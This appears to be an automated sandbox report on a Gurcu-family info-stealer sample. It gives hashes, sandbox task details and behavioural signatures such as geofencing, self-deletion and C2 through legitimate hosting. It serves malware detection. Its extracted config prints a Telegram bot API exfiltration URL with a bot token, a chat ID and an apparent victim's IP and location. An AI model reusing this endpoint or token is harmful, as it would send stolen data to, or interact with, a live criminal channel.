General
Target: 177a970a8a6c5e5e6b5c04c40bf3fe1c.bin
Size: 4.1MB
Sample: 241215-bgmdvszkhv
MD5: 7254948744fc00a20232efe40bb827af
SHA1: b15e3b2830591b165849eab582c371079bbb8ba0
SHA256: 000632b4fd95543078e43a2611355f9032c621baaf5a8aec4eead9c3e78b9749
SHA512: 43116ea789aa3634e0f8fe2f9fba2680738c77495b32c2a9ef86bb777a3bcfb680ce62ef96ec204f8028e29a90ed4a60543721be8655e4335f5d240694454401
SSDEEP: 98304:suKKYCTgUHw2rvQl+VGCjY2PUADw+6KwSlZ+Asz:f0yg9IVVG6BwOwc+P
Static task: static1
Behavioral task: behavioral1
Sample: 2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb.exe
Resource: win7-20240903-en
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendDocument?chat_id=6518356118&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Targets
Target: 2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb.exe
Size: 5.6MB
MD5: 177a970a8a6c5e5e6b5c04c40bf3fe1c
SHA1: 64709ca99a03f416a854817427d4543043e204ad
SHA256: 2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb
SHA512: 4c1c3716ec518102d16e11fbb84f0446d75cfc8db97a5635e4f71e407431b2a21bdb35bfa38e5414f28d044b176cfce044e5da0984c519713c0e3b82657a2317
SSDEEP: 98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE

Signatures
Gurcu family
Checks computer location settings: looks up the country code configured in the registry, likely a geofence.
Deletes itself
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP.